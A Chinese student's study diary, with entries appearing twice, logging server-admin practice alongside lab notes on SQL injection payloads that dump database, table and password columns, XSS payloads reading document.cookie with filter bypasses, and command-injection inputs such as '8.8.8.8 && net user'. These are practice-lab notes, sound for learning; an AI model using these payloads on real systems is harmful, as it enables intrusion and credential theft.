我的拖延症真的太严重了,事情虽然总是会拖到最后再做,但是也总会去完成它。希望通过这个网站记录我学习的点滴,在与右边那家伙的共同记录下,改变拖延症,沉迷于学习~!

不论别人做了什么,我们都要做到自己应该做的。做自己世界的疯子,二货,沙雕,总比戴着个面具活着快乐。

今天,你好好学习了嘛?

2019年09月17日 星期二

一大早惯例过一遍Linux真题

在FTP虚拟用户配置上卡壳

Apache服务Get到了新知识点

今日完成项:

1.Windows Server(2小时)

2.Linux Server(5小时)

3.XXXXXX

Windows看了一下AD DS,感觉收获不是很多

Linux-NFS服务Get到了新知识点

默认连接为nfsnobody账户,可以手动进行指定

这阵子伙伴们摸鱼更厉害了,直接不在工位

如果再这样,这个网站也便没有存在的意义了

2019年09月17日 星期二

今天复习了一下SQL注入大法,
然后去墨者学院做了一道SQL字符型注入的题~

'1  and 1=1
'1  and 1=2
'1  and 1=1#
'1  and 1=2#
'% and '%'='
’1 order by 1
' 1 order by n
' 1 union select 1,n
' 1 union select 1,database(),n  爆数据库
' 1 union select 1,group_concat(table_name),n from information_schema.tables where table_schema='数据库名'    爆表名
' 1 union select 1,group_concat(column_name),n from information_schema.columns where table_name='表名'        爆列名
’1 union select 1,group_concat(user),group_concat(password),n from '表名'

SQL注入大法,
最重要的就是发现他的那个可以闭合的一个语句,
这个语句并不唯一,
找到这个语句,SQL注入其他的东西进本都是固定的。
相对而言SQL注入还是挺简单的,当然是在找到闭合语句的前提下。

2019年09月16日 星期一

早上跟着样题过了一遍

Linux全程花了2小时

比赛当天得注意时间的分配


今日完成项:

1.Windows Server(1小时)

2.Linux Server(5小时30分钟)

3.扇贝单词新词50个(1小时)

Screenshot_20190916.jpg

感觉眼睛好疼啊,晚上回去看电影《一条狗的使命》

最近状态不佳,得想办法赶紧调整心态!!!

2019年09月16日 星期一

XSS:

1.XSS(dom):
low:
在 URL 后直接加入攻击脚本 <script>alert(document.cookie)</script>,发现可以直接弹窗
medium:
Donot allow script tags.
在 URL 后直接加入<img src=1 onerror=alert(document.cookie)>
还是不行,查看网页源代码,
发现内容被输出到了option标签的VALUE值里了,
所以要将option标签提前闭合。
构造 </option> 标签和 </select> 标签来闭合语法,使脚本能够被执行:
></option></select><img src=1 onerror=alert(document.cookie)>
high:
使用了白名单机制:
虑到 JS 是前端脚本,
我们只需要在正常提交的值后用 # 把后面的攻击脚本注释掉,
脚本内容就不会提交至服务器,也就可以通过白名单验证
#<script>alert(document.cookie)</script>
2.反射型XSS(reflected):
low:
没有任何防备:<script>alert(document.cookie)</script>
medium:
对敏感的JS语句做出了过滤或者转义
查看源代码发现只对小写script做出了替换,
我们使用大写的:
<SCRIPT>alert(doucment.cookie)</SCRIPT>
high:
该替换函数使用正则表达式进行了script 的逐字检查,
并通过 /i 来不区分大小写
img中的oneorrr也可以调用JS脚本
<img src=1 onerror=alert(document.cookie)>
3.存储型XSS(Stored):
low:
没有任何门槛,直接输入:
<script>alert(document.cookie)</script>
medium:
脚本被转义,同样只转义了但是大小写是分开的,
所以可以使用大写来绕过~
<SCRIPT>alert(document.cookie)</SCRIPT>
high:
不能使用<script>标签,但可以使用<img>标签。
由于前端仍然有字符长度限制,
所以仍需要使用Burpsuite来修改数据包。
在Burpsuite中修改数据包中的txtName内容为:
<img src=1 onerror=alert(document.cookie)>

2019年09月15日 星期天

早上把昨天剩下的

Windows FTP域用户隔离解决了

系统的学习了一遍Linux——DHCP服务

折腾了DHCP超级作用域,DHCP中继实验

Linux——SAMBA服务挂载、虚拟用户以及别名

Screenshot_20190915.jpg

晚上又折腾了一下telnet登录

仅允许某一网段访问,以及开放root登录

今日完成项:

1.Windows Server(30分钟)

2.Linux Server(7小时30分钟)

3.扇贝单词新词50个(1小时)

总学习时长8小时

2019年09月15日 星期天

命令行注入:

LOW:
使用&&连接符~:
8.8.8.8 && net user    
8.8.8.8 && ipconfig 
...
MID:
使用&连接符:
8.8.8.8 & net user    
8.8.8.8 & ipconfig 
High:
使用'|'管道符:
8.8.8.8 | net user    
8.8.8.8 | ipconfig 

&& 和 & 的区别是:
&& 是只有当前一个命令执行成功后,
才会执行第二个命令;
而 & 是不管第一个命令是否执行成功,
都会执行第二个命令。

2019年09月14日 星期六

这天,
开车去火车站,
然后坐高铁地铁,
辗转反侧,
坐公交,
回到学校,
然后继续战斗。

2019年09月14日 星期六

上午过了一遍Linux磁盘阵列

将VMware升级到了15版本

系统环境全部重装

三台WIN-Server终于没有黑屏了

域服务以及安全策略配置正常~


下午get到了

DFS分佈式文件系统服务

CA证书服务器,很通透哇~

Windows FTP服务用户隔离这块待解决

今日完成项:

1.Linux Server(30分钟)

2.Windows Server(8小时)

3.扇贝单词新词(1小时)

Screenshot_20190914.jpg

吃完饭又回到了实训室

一晃十点了,已猝

2019年09月13日 星期五

今天早上大概九点多起床,
吃了蒸饺和水饺,
然后开车去了鄂州图书馆,
环境是真的好,超棒。
然后看到了一句话,
然后就抄了下来:

我们这群人,苦没有真正苦过,爱没有用力爱过。
每天受着信息大潮的冲击,三观未定又备受曲折。
贫穷不再是正义,又妄图不让金钱成为唯一的追求。
过早看到了更大的世界,勤奋却又不过三天。
热血透不过键盘和屏幕,回忆止于游戏和高考。
像一群没有根的孩子,在别人的经历和精神里吵闹。

QQ图片20190914204247.jpg

2019年09月13日 星期五

今日完成项:

1.Linux Server(4小时)

2.Windows Server(3小时)

3.扇贝单词新词50个(1小时)

一天又过去了……

早上刷Linux基础

过了一遍OSI七层模型,所有服务运行的端口

Centos6.X 与 Centos7.X 异同点

windows RAID1<==>镜像盘以及RAID5

苦恼的是虚拟环境机器开多了会黑屏

实验很多做不了

出门看看下雨了没有,没下雨跑个步吃饭


准备跑10公里,可惜实力不允许

6.66公里就结束了跑步

Screenshot_20190914_121010.jpg

校雷锋连在操场组织晚会

边跑边听他们唱歌,感觉有点伤感啊

想起了高中体育训练的那些日子

2019年09月12日 星期四

9.12号,早上起点起床。
租了一天的联动云,先送周应去考科目四,
顺利拿到证后开车回到虎泉,
停车的时候差点撞到人了,
本来看到人想踩刹车的,踩成油门了,
现在想想有点后怕,
哇,我开车还是有点莽,
容易上头,这个得改,要不然就少开车,
下午和周应换着开,
走低速会回鄂州,
嗯,开车是个费精神的活。
开了一个半小时,终于回到鄂州。
然后晚上在周应家吃了顿饭。
还行,
不过联动云实在是太贵了,
我觉得以后还是不要租联动云了,
买了车的人不一定很有钱,
但是经常租车的人一定很有钱!

2019年09月12日 星期四

早上实训室老师要开会

带着电脑回寝室了

给电脑清了个灰,接着上午就过去了

今日完成项:

1.Linux昨日内容+DNS分离解析(5小时)

2.扇贝单词50个新词(1小时)

3.操场5公里锻炼(30分钟)

今天状态不大好……

晚上想打游戏想打游戏!!!

晚上跑完步跟老哥一起喝了杯星冰乐

哇哦味道不错,就是有点穷

2019年09月11日 星期三

今日完成项:

1.Linux Server (7小时)

2.扇贝单词新词50个(1小时)

3.操场5公里跑+带斯薇运动(1小时)

IMG_20190911_221827.jpg

今天可算是把Linux--Ftp虚拟用户弄懂了

DNS加深了些,从服务器,缓存服务器很舒服~

晚上跑步有点吃不消哇,头晕晕的

最后跟着做了几组俯卧撑,趴,起不来了...

2019年09月11日 星期三

懒得给标题文章起名字了,
911貌似是美国五角大楼出事的日子,
不过跟我貌似没什么关系,
今天九点半到的,
准备做一下震网病毒的实验吧~

1.快捷方式文件解析漏洞--------MS10-046
2.RPC远程执行漏洞-------------MS08-067
3.打印机后台程序服务漏洞------MS10-061
4.内核模式驱动程序------------MS10-073
5.任务计划程序漏洞------------MS10-092

2019年09月17日 星期二

一大早惯例过一遍Linux真题

在FTP虚拟用户配置上卡壳

Apache服务Get到了新知识点

今日完成项:

1.Windows Server(2小时)

2.Linux Server(5小时)

3.XXXXXX

Windows看了一下AD DS,感觉收获不是很多

Linux-NFS服务Get到了新知识点

默认连接为nfsnobody账户,可以手动进行指定

这阵子伙伴们摸鱼更厉害了,直接不在工位

如果再这样,这个网站也便没有存在的意义了

2019年09月16日 星期一

早上跟着样题过了一遍

Linux全程花了2小时

比赛当天得注意时间的分配


今日完成项:

1.Windows Server(1小时)

2.Linux Server(5小时30分钟)

3.扇贝单词新词50个(1小时)

Screenshot_20190916.jpg

感觉眼睛好疼啊,晚上回去看电影《一条狗的使命》

最近状态不佳,得想办法赶紧调整心态!!!

2019年09月15日 星期天

早上把昨天剩下的

Windows FTP域用户隔离解决了

系统的学习了一遍Linux——DHCP服务

折腾了DHCP超级作用域,DHCP中继实验

Linux——SAMBA服务挂载、虚拟用户以及别名

Screenshot_20190915.jpg

晚上又折腾了一下telnet登录

仅允许某一网段访问,以及开放root登录

今日完成项:

1.Windows Server(30分钟)

2.Linux Server(7小时30分钟)

3.扇贝单词新词50个(1小时)

总学习时长8小时

2019年09月14日 星期六

上午过了一遍Linux磁盘阵列

将VMware升级到了15版本

系统环境全部重装

三台WIN-Server终于没有黑屏了

域服务以及安全策略配置正常~


下午get到了

DFS分佈式文件系统服务

CA证书服务器,很通透哇~

Windows FTP服务用户隔离这块待解决

今日完成项:

1.Linux Server(30分钟)

2.Windows Server(8小时)

3.扇贝单词新词(1小时)

Screenshot_20190914.jpg

吃完饭又回到了实训室

一晃十点了,已猝

2019年09月13日 星期五

今日完成项:

1.Linux Server(4小时)

2.Windows Server(3小时)

3.扇贝单词新词50个(1小时)

一天又过去了……

早上刷Linux基础

过了一遍OSI七层模型,所有服务运行的端口

Centos6.X 与 Centos7.X 异同点

windows RAID1<==>镜像盘以及RAID5

苦恼的是虚拟环境机器开多了会黑屏

实验很多做不了

出门看看下雨了没有,没下雨跑个步吃饭


准备跑10公里,可惜实力不允许

6.66公里就结束了跑步

Screenshot_20190914_121010.jpg

校雷锋连在操场组织晚会

边跑边听他们唱歌,感觉有点伤感啊

想起了高中体育训练的那些日子

2019年09月12日 星期四

早上实训室老师要开会

带着电脑回寝室了

给电脑清了个灰,接着上午就过去了

今日完成项:

1.Linux昨日内容+DNS分离解析(5小时)

2.扇贝单词50个新词(1小时)

3.操场5公里锻炼(30分钟)

今天状态不大好……

晚上想打游戏想打游戏!!!

晚上跑完步跟老哥一起喝了杯星冰乐

哇哦味道不错,就是有点穷

2019年09月11日 星期三

今日完成项:

1.Linux Server (7小时)

2.扇贝单词新词50个(1小时)

3.操场5公里跑+带斯薇运动(1小时)

IMG_20190911_221827.jpg

今天可算是把Linux--Ftp虚拟用户弄懂了

DNS加深了些,从服务器,缓存服务器很舒服~

晚上跑步有点吃不消哇,头晕晕的

最后跟着做了几组俯卧撑,趴,起不来了...

2019年09月17日 星期二

今天复习了一下SQL注入大法,
然后去墨者学院做了一道SQL字符型注入的题~

'1  and 1=1
'1  and 1=2
'1  and 1=1#
'1  and 1=2#
'% and '%'='
’1 order by 1
' 1 order by n
' 1 union select 1,n
' 1 union select 1,database(),n  爆数据库
' 1 union select 1,group_concat(table_name),n from information_schema.tables where table_schema='数据库名'    爆表名
' 1 union select 1,group_concat(column_name),n from information_schema.columns where table_name='表名'        爆列名
’1 union select 1,group_concat(user),group_concat(password),n from '表名'

SQL注入大法,
最重要的就是发现他的那个可以闭合的一个语句,
这个语句并不唯一,
找到这个语句,SQL注入其他的东西进本都是固定的。
相对而言SQL注入还是挺简单的,当然是在找到闭合语句的前提下。

2019年09月16日 星期一

XSS:

1.XSS(dom):
low:
在 URL 后直接加入攻击脚本 <script>alert(document.cookie)</script>,发现可以直接弹窗
medium:
Donot allow script tags.
在 URL 后直接加入<img src=1 onerror=alert(document.cookie)>
还是不行,查看网页源代码,
发现内容被输出到了option标签的VALUE值里了,
所以要将option标签提前闭合。
构造 </option> 标签和 </select> 标签来闭合语法,使脚本能够被执行:
></option></select><img src=1 onerror=alert(document.cookie)>
high:
使用了白名单机制:
虑到 JS 是前端脚本,
我们只需要在正常提交的值后用 # 把后面的攻击脚本注释掉,
脚本内容就不会提交至服务器,也就可以通过白名单验证
#<script>alert(document.cookie)</script>
2.反射型XSS(reflected):
low:
没有任何防备:<script>alert(document.cookie)</script>
medium:
对敏感的JS语句做出了过滤或者转义
查看源代码发现只对小写script做出了替换,
我们使用大写的:
<SCRIPT>alert(doucment.cookie)</SCRIPT>
high:
该替换函数使用正则表达式进行了script 的逐字检查,
并通过 /i 来不区分大小写
img中的oneorrr也可以调用JS脚本
<img src=1 onerror=alert(document.cookie)>
3.存储型XSS(Stored):
low:
没有任何门槛,直接输入:
<script>alert(document.cookie)</script>
medium:
脚本被转义,同样只转义了但是大小写是分开的,
所以可以使用大写来绕过~
<SCRIPT>alert(document.cookie)</SCRIPT>
high:
不能使用<script>标签,但可以使用<img>标签。
由于前端仍然有字符长度限制,
所以仍需要使用Burpsuite来修改数据包。
在Burpsuite中修改数据包中的txtName内容为:
<img src=1 onerror=alert(document.cookie)>

2019年09月15日 星期天

命令行注入:

LOW:
使用&&连接符~:
8.8.8.8 && net user    
8.8.8.8 && ipconfig 
...
MID:
使用&连接符:
8.8.8.8 & net user    
8.8.8.8 & ipconfig 
High:
使用'|'管道符:
8.8.8.8 | net user    
8.8.8.8 | ipconfig 

&& 和 & 的区别是:
&& 是只有当前一个命令执行成功后,
才会执行第二个命令;
而 & 是不管第一个命令是否执行成功,
都会执行第二个命令。

2019年09月14日 星期六

这天,
开车去火车站,
然后坐高铁地铁,
辗转反侧,
坐公交,
回到学校,
然后继续战斗。

2019年09月13日 星期五

今天早上大概九点多起床,
吃了蒸饺和水饺,
然后开车去了鄂州图书馆,
环境是真的好,超棒。
然后看到了一句话,
然后就抄了下来:

我们这群人,苦没有真正苦过,爱没有用力爱过。
每天受着信息大潮的冲击,三观未定又备受曲折。
贫穷不再是正义,又妄图不让金钱成为唯一的追求。
过早看到了更大的世界,勤奋却又不过三天。
热血透不过键盘和屏幕,回忆止于游戏和高考。
像一群没有根的孩子,在别人的经历和精神里吵闹。

QQ图片20190914204247.jpg

2019年09月12日 星期四

9.12号,早上起点起床。
租了一天的联动云,先送周应去考科目四,
顺利拿到证后开车回到虎泉,
停车的时候差点撞到人了,
本来看到人想踩刹车的,踩成油门了,
现在想想有点后怕,
哇,我开车还是有点莽,
容易上头,这个得改,要不然就少开车,
下午和周应换着开,
走低速会回鄂州,
嗯,开车是个费精神的活。
开了一个半小时,终于回到鄂州。
然后晚上在周应家吃了顿饭。
还行,
不过联动云实在是太贵了,
我觉得以后还是不要租联动云了,
买了车的人不一定很有钱,
但是经常租车的人一定很有钱!

2019年09月11日 星期三

懒得给标题文章起名字了,
911貌似是美国五角大楼出事的日子,
不过跟我貌似没什么关系,
今天九点半到的,
准备做一下震网病毒的实验吧~

1.快捷方式文件解析漏洞--------MS10-046
2.RPC远程执行漏洞-------------MS08-067
3.打印机后台程序服务漏洞------MS10-061
4.内核模式驱动程序------------MS10-073
5.任务计划程序漏洞------------MS10-092